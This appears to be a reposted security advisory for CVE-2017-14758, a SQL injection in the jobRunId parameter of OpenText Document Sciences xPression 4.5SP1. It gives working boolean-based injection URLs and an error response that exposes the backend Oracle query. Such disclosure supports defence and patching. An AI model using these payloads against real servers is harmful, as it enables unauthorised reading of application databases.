OpenText Document Sciences xPression 4.5SP1 Patch 13 jobRunId SQL Injection

Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Title: OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) - SQL Injection Author: Marcin Woloszyn Date: 27. September 2017 CVE: CVE-2017-14758 Affected Software: ================== OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) Exploit was tested on: ====================== v4.5SP1 Patch 13 (older versions might be affected as well) SQL Injection: ============== Due to lack of prepared statements an application is prone to SQL Injection attacks. Potential attacker can retrieve data from application database by exploiting the issue. Vector : -------- True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1 False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2 Additionally: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa Results in the following error in response: HTTP/1.1 200 OK [...] <b>Errors:&nbsp;</b> See nested exception&#x3b; nested exception is&#x3a; java.lang.RuntimeException&#x3a;; CRReportingSL&#x3a; Method getJobRunsByIds did not succeed because of a database operation failure.&#x3b; &#x9;---> nested; Database syntax error &#x3a;SELECT JOBRUN_ID, JOB_NAME, PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION, DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID FROM T_JOBRUN WHERE JOBRUN_ID&#x3d;1502642747222443244706554841153aaa.&#x3b; &#x9;---> nested java.sql.SQLSyntaxErrorException&#x3a; ORA-00933&#x3a; SQL command not properly ended An attacker can see whole query and injection point. This can also be used for error-based data extraction. Fix: ==== Contact: ======== mw[at]nme[dot]pl

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018,


Back to Top